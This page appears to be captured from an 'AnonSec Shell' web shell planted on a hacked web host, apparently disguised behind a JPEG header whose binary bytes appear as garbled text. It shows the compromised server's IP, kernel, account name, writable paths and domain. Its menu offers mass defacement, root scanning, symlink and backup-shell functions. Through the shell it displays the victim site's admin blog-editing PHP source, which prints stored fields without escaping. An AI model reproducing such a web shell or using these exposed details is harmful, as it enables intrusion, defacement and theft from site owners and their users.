JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 46.28.45.50  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux in-mum-web1275.main-hosting.eu 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User : u215115003 ( 215115003)
PHP Version : 8.1.34
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u215115003/domains/luxurymotorz.com/public_html/admin/dashboard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/u215115003/domains/luxurymotorz.com/public_html/admin/dashboard/new-blog.php
<?php include "include/header.inc.php";
if (isset ($_GET['url1'])) {
   $url = trim($_GET['url1']);
   $requestArray = explode("/", $url);
   if (!empty (is_numeric($requestArray[1]))) {
      $blog_rs = displayByID("blogs", "blog_id", $requestArray[1]);
   } else {
      header("Location:" . RESOURCE_PATH . "empty-response/");
   }
}



$dsql = "SELECT * FROM blogs WHERE blog_status='Active'";
$dstmtt = $DB->prepare($dsql);
$dstmtt->execute();
$drss = $dstmtt->FetchAll();

?>
<div class="row page-titles">
   <div class="col-md-12 col-12 align-self-center">
      <h3 class="text-themecolor mb-0 mt-0">Blog</h3>
      <ol class="breadcrumb">
         <li class="breadcrumb-item"><a href="<?= LOGIC_PATH ?>home/">Home</a></li>
         <li class="breadcrumb-item"><a href="<?= LOGIC_PATH ?>blogs/">Blogs</a></li>
         <?php
         if (isset ($_GET['url1'])) { ?>
            <li class="breadcrumb-item text-white">Edit Blog</li>
            <li class="breadcrumb-item active">
               <?= $blog_rs[0]['blog_title'] ?>
            </li>
         <?php } else { ?>
            <li class="breadcrumb-item active">New blog</li>
         <?php } ?>
      </ol>
   </div>
</div>
<div class="col-12">
   <div class="card">
      <div class="card-body">
         <?php
         if (isset ($_GET['url1'])) { ?>
            <form method="post" class="blog_form" enctype="multipart/form-data">
               <div class="row">
                  <div class="col-md-12">
                     <label>Blog Title</label>
                     <input type="text" name="blog_title" id="blog_title" class="form-control"
                        value="<?= $blog_rs[0]['blog_title'] ?>">
                     <input type="hidden" name="blog_id" id="blog_id" value="<?= $blog_rs[0]['blog_id'] ?>">
                  </div>
                  <div class="col-md-12">
                     <div class="form-group">
                        <label>Blog Short Description</label>
                        <textarea name="blog_sdescription" id="blog_sdescription" class="form-control"><?= $blog_rs[0]['blog_sdescription'] ?></textarea>
                     </div>
                  </div>
                  <div class="col-md-12">
                     <div class="form-group">
                        <label>Blog Description</label>
                        <textarea name="blog_description" id="blog_description" rows="10"
                            cols="80"><?= $blog_rs[0]['blog_description'] ?></textarea>
                     </div>
                  </div>
                  <div class="col-md-12">
                     <label>Image (Less than 1.5 MB) 800 X 400</label>
                     <input type="file" name="blog_url" id="blog_url" class="form-control" accept="image/*" onchange="previewImage()">
                  </div>
                  <div class="col-md-12 form-group">

                     <?php if ($blog_rs[0] && $blog_rs[0]['blog_url'] != '') { ?>
                        <img class="default_img" id="imagePreview"
                           src="<?= MAIN_DIR ?>static/<?= $blog_rs[0]['blog_url'] ?>" alt="">

                     <?php } else { ?>
                        <img class="default_img" id="imagePreview"
                           src="<?= RESOURCE_PATH ?>assets/images/default/about_default.png">
                     <?php } ?>
                  </div>
                  <div class="col-md-12 mt-3" align="center">

                     <button type="submit" class="btn btn-primary" id="blog_submit">Update</button>

                  </div>
               </div>
            </form>



         <?php } else { ?>

            <form method="post" class="blog_form" enctype="multipart/form-data">
               <div class="row">
                  <div class="col-md-12">
                     <div class="form-group">
                        <label>Blog Title</label>
                        <input type="text" name="blog_title" id="blog_title" class="form-control" value="">
                        <input type="hidden" name="blog_id" id="blog_id" value="">
                     </div>
                  </div>
                  <div class="col-md-12">
                     <div class="form-group">
                        <label>Blog Short Description</label>
                        <textarea name="blog_sdescription" id="blog_sdescription" class="form-control"></textarea>
                     </div>
                  </div>
                  <div class="col-md-12">
                     <div class="form-group">
                        <label>Blog Description</label>
                        <textarea name="blog_description" id="blog_description" rows="10"
                            cols="80"></textarea>
                     </div>
                  </div>
                  <div class="col-md-12">
                     <div class="form-group">
                        <label>Image (Less than 1.5 MB) 800 X 400</label>
                        <input type="file" name="blog_url" id="blog_url" class="form-control" accept="image/*" onchange="previewImage()">
                     </div>
                  </div>
                  <div class="col-md-12">
                     <div class="form-group">
                        <img class="default_img" id="imagePreview"
                           src="<?= RESOURCE_PATH ?>assets/images/default/blog_default.png">
                     </div>
                  </div>
                  <div class="col-md-12 mt-3" align="center">
                     <button type="submit" class="btn btn-primary" id="blog_submit">Create</button>
                  </div>
               </div>
            </form>


         <?php } ?>


      </div>
   </div>
</div>
<?php include "include/footer.inc.php"; ?>
<script src="<?= LOGIC_PATH ?>custom_js/ckeditor/ckeditor.js"></script>
<script src="<?= LOGIC_PATH ?>custom_js/blogs.js"></script>
<script>
   function previewImage() {
      var input = document.getElementById('blog_url');
      var preview = document.getElementById('imagePreview');

      if (input.files && input.files[0]) {
         var reader = new FileReader();

         reader.onload = function (e) {
            preview.src = e.target.result;
            preview.style.display = 'block';
         };

         reader.readAsDataURL(input.files[0]);
      }
   }
</script>
<script type="text/javascript">
    CKEDITOR.replace('blog_description');
    CKEDITOR.instances['blog_description'].updateElement();
</script>

Anon7 - 2022
AnonSec Team